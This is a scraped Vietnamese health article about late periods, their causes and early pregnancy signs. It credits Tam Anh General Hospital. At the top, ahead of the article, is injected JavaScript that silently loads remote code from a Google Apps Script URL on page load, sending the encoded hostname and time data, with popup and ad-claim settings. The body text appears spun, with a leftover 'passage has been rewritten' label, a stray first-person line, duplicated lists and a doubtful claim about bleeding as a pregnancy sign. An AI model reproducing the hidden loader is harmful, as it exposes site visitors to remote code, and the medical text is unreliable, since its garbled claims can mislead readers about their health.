var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Trễ kinh bao nhiêu ngày là bình thường? Chậm bao lâu bất thường?

Trễ kinh bao nhiêu ngày là bình thường? Chậm bao lâu bất thường?

26/05/2023 goole news

Kinh nguyệt được coi là một chỉ số quan trọng cho sức khỏe sinh sản của phụ nữ. Vì vậy, nhiều người phụ nữ thắc mắc liệu việc trễ kinh có phải là điều bình thường và số ngày trễ kinh bao nhiêu là đáng lo ngại? Làm cách nào để phát hiện sớm trễ kinh do mang thai hoặc vấn đề về sức khỏe?

trễ kinh bao nhiêu ngày là bình thường

Tìm hiểu về chu kỳ kinh nguyệt

Chu kỳ kinh nguyệt tính từ ngày đầu tiên của tháng này đến ngày đầu tiên của tháng tiếp theo. Chu kỳ này diễn ra hàng tháng. Trung bình một chu kỳ kinh nguyệt kéo dài 28 ngày, nhưng cũng có thể kéo dài từ 21 đến 35 ngày. Trong mỗi chu kỳ, thời gian hành kinh kéo dài từ 2 đến 7 ngày. Lượng máu mất đi trong mỗi chu kỳ khoảng từ 50 đến 150ml. Máu kinh có màu đỏ thẫm, hơi dính và thỉnh thoảng có những cục máu nhỏ.

Trường hợp khi đã trôi qua 35 ngày tính từ ngày hành kinh gần nhất mà chị em vẫn chưa có chu kỳ kinh nguyệt trở lại, ta gọi là trễ kinh. Ngược lại, nếu chị em không có chu kỳ kinh nguyệt trong 3 kỳ liên tiếp, ta gọi là vô kinh.

Trễ kinh bao nhiêu ngày là bình thường?

Kinh nguyệt ảnh hưởng đến sức khỏe sinh sản của phụ nữ. Chị em thường lo lắng khi kinh trễ và muốn biết số ngày trễ kinh là bình thường. Nếu chu kỳ kinh nguyệt bình thường, trễ kinh dưới 5 ngày vẫn được coi là bình thường. Tuy nhiên, nếu trễ kinh trên 5 ngày, chị em cần xem xét việc thăm khám ngay để kiểm tra xem có thai hay gặp vấn đề sức khỏe và bệnh phụ khoa. Điều quan trọng là chị em nên đến cơ sở y tế để được thăm khám và điều trị sớm để xác định nguyên nhân gây trễ kinh. (1)

Trễ kinh cũng là một dấu hiệu cảnh báo về vấn đề vô sinh hiếm muộn do hoạt động rụng trứng ở nữ giới không bình thường. Vì vậy, chị em không nên coi thường mà nên đi khám sớm để được điều trị kịp thời, tránh những biến chứng nghiêm trọng ảnh hưởng đến sức khỏe và khả năng sinh sản.

theo dõi chu kỳ kinh nguyệt hàng tháng
Chị em nên theo dõi chu kỳ kinh nguyệt hàng tháng để phát hiện sớm tình trạng trễ kinh

Trễ kinh bao lâu thì có thai?

Khó có thể xác định được thời gian trễ kinh để có thai vì mỗi người có chu kỳ kinh nguyệt khác nhau. Thông thường, nếu kinh trễ từ 4-7 ngày sau khi có quan hệ tình dục mà không sử dụng biện pháp tránh thai, có khả năng cao là đã có thai.

Trong mỗi chu kỳ kinh nguyệt, một trứng sẽ được giải phóng từ buồng trứng, vì hiện tượng rụng trứng chỉ xảy ra một lần. Nếu trứng gặp tinh trùng và thụ tinh thành công, nó sẽ tạo thành hợp tử. Sau đó, hợp tử sẽ di chuyển theo ống dẫn trứng đến buồng tử cung để phát triển và hình thành tổ.

Quá trình này khiến nồng độ hormone hCG trong cơ thể phụ nữ tăng lên, và việc tăng cao nồng độ hCG là một trong những dấu hiệu sớm của mang thai. Chị em có thể sử dụng que thử thai để kiểm tra nồng độ hCG trong nước tiểu, hoặc đến cơ sở y tế để được làm xét nghiệm beta-hCG.

Vì sao khi mang thai thường bị trễ kinh?

Nhiều chị em thắc mắc vì sao lại có hiện tượng trễ kinh trong khi mang thai. Thông thường, trong mỗi chu kỳ, lớp niêm mạc tử cung sẽ phát triển dày hơn để chuẩn bị cho quá trình hợp tử và phát triển thành thai. Tuy nhiên, nếu quá trình thụ tinh không xảy ra, các yếu tố nội tiết tố và co bóp tử cung sẽ làm cho lớp niêm mạc này bong ra và được đào thải qua âm đạo, gọi là kinh nguyệt. (3).

Trong trường hợp trứng và tinh trùng gặp nhau, quá trình thụ tinh thành công sẽ khiến lớp niêm mạc tử cung không bị bong ra mà tiếp tục phát triển để nuôi dưỡng và bảo vệ thai nhi suốt quá trình phát triển. Do đó, trễ kinh là một dấu hiệu cho thấy có khả năng mang thai. Để xác định chính xác, chị em có thể sử dụng que thử thai tại nhà hoặc đến bệnh viện để làm xét nghiệm máu.

Có thể nhận biết mang thai qua những dấu hiệu nào khác không?

Ngoài dấu hiệu trễ kinh, chị em nên chú ý những triệu chứng dưới đây để chuẩn bị tốt cho thai kỳ:- Buồn nôn và nôn mửa- Mệt mỏi và khó thức dậy- Cảm giác thèm ăn tăng lên- Đau ngực và nhạy cảm với mùi- Thay đổi tâm trạng và dễ bực bội- Thường xuyên đi tiểu- Đau lưng và cơ thể căng thẳng- Vùng ngực và vú nhạy cảm hơn bình thường- Da thay đổi và mụn trứng cá có

 • Buồn nôn và nôn là do tình trạng ốm nghén.
 • Có những thay đổi xuất hiện ở vùng ngực như ngực trở nên mềm hơn, đầu nhũ hoa sưng, thâm và đau.
 • Mệt mỏi;.
 • Đau đầu;.
 • Đau lưng;.
 • Tôi đi tiểu nhiều lần.
 • Máu ra khỏi âm đạo là dấu hiệu của thai nhi.
 • nhạy cảm với mùi vị và buồn nôn
  Bên cạnh trễ kinh, chị em có thể phát hiện sớm việc mang thai thông qua các dấu hiệu như nhạy cảm với mùi vị, buồn nôn, nôn, mệt mỏi…

  Nguyên nhân bị chậm kinh nhưng không có thai

  Việc trễ kinh không chỉ có thể do mang thai mà còn có thể do nhiều nguyên nhân khác, bao gồm: (4).

 • Khi trạng thái căng thẳng hay stress xảy ra, các hormone như Cortisol và Epinephrine sẽ được sản sinh, tác động đến vùng dưới đồi và gây ảnh hưởng đến chu kỳ kinh nguyệt.
 • Khi cơ thể tăng hoặc giảm cân nhanh chóng, việc này sẽ ảnh hưởng đến việc sản xuất hormone Estrogen trong cơ thể, gây ra sự mất cân bằng nội tiết tố. Điều này được coi là một trong những nguyên nhân phổ biến nhất gây trễ kinh.
 • Những nữ vận động viên thường gặp tình trạng tập thể dục quá sức, khi tập luyện thể dục và thể thao với mức độ cao, gây áp lực lên cơ thể và gây mất cân bằng nội tiết tố nữ.
 • Các bệnh phụ khoa như u xơ cổ tử cung, viêm âm đạo… Cũng có thể là nguyên nhân gây chậm kinh.
 • Thuốc tránh thai nội tiết có thể gây rối loạn kinh nguyệt ở người sử dụng.
 • Làm gì khi bị trễ kinh?

  Nếu những chị em thường có chu kỳ kinh nguyệt đều đặn hàng tháng mà bỗng dưng bị trễ kinh, họ cần thực hiện những việc sau đây:

  Nếu có trường hợp trễ kinh sau quan hệ tình dục mà không sử dụng biện pháp tránh thai, chị em có thể sử dụng que thử thai hoặc đến ngay cơ sở y tế để làm xét nghiệm beta-hCG để kiểm tra xem có mang thai hay không. Nếu kết quả xác nhận mang thai, bác sĩ sẽ tư vấn và hướng dẫn chăm sóc và theo dõi thai kỳ tốt nhất.

  Khi xảy ra trường hợp trễ kinh mà không có thai, bác sĩ sẽ yêu cầu một số xét nghiệm để tìm hiểu nguyên nhân. Nếu trễ kinh là do vấn đề sức khỏe hoặc bệnh phụ khoa, bác sĩ sẽ cung cấp hướng dẫn về phương pháp điều trị phù hợp và hiệu quả, nhằm tránh các biến chứng nguy hiểm có thể xảy ra.

  Trung tâm Sản Phụ khoa của Bệnh viện Đa khoa Tâm Anh là nơi tập trung các chuyên gia Sản Phụ khoa có chuyên môn cao, giàu kinh nghiệm. Trung tâm cũng được trang bị hệ thống máy móc hiện đại và áp dụng phác đồ thăm khám và điều trị cá thể hóa, nhằm phát hiện và điều trị hiệu quả các vấn đề sức khỏe phụ nữ.

  Trung tâm Sản Phụ khoa không chỉ cung cấp các dịch vụ chăm sóc thai sản đa dạng như thai sản trọn gói, sinh con trọn gói, thai sản theo yêu cầu… Mà còn đảm bảo mang đến cho mẹ bầu dịch vụ chăm sóc thai kỳ tốt nhất, giúp mẹ an tâm tận hưởng thai kỳ khỏe mạnh, sinh nở an toàn và có một gia đình hạnh phúc.

  Để đặt lịch hẹn và nhận tư vấn từ các chuyên gia Sản Phụ khoa tại Bệnh viện Đa khoa Tâm Anh, chị em vui lòng liên hệ đến:

  Phòng ngừa tình trạng chậm kinh bằng cách nào?

  Có một số phương pháp mà chị em có thể tham khảo để giảm tình trạng kinh nguyệt chậm.

 • Xây dựng một chế độ ăn uống khoa học, cung cấp đầy đủ các nhóm chất dinh dưỡng cần thiết cho cơ thể.
 • Hãy chọn một bộ môn thể dục thể thao phù hợp với tình trạng sức khỏe của bạn và tập luyện với mức độ cường độ phù hợp. Đồng thời, hãy tránh tập quá sức.
 • Cố gắng đảm bảo sự cân bằng giữa công việc và thời gian nghỉ ngơi, tạo điều kiện để cơ thể luôn trong trạng thái thoải mái, vui tươi và lạc quan, từ đó giúp ổn định nội tiết tố trong cơ thể.
 • Đoạn văn đã được viết lại: Để đảm bảo sức khỏe tổng thể và sức khỏe sinh sản nữ giới tốt nhất, nên thăm khám phụ khoa định kỳ ít nhất 6 tháng một lần. Điều này giúp phát hiện sớm các vấn đề bất thường và có thể xử trí và can thiệp kịp thời.
 • Hy vọng qua bài viết này, chị em sẽ tìm được câu trả lời cho thắc mắc về việc trễ kinh bao nhiêu ngày là bình thường. Nếu vẫn còn thắc mắc hoặc băn khoăn, chị em có thể liên hệ đến hotline của Hệ thống Bệnh viện Đa khoa Tâm Anh để được sự hỗ trợ từ các chuyên gia Sản Phụ khoa.

  Lần cập nhật mới nhất: 16:58 ngày 01/06/2023.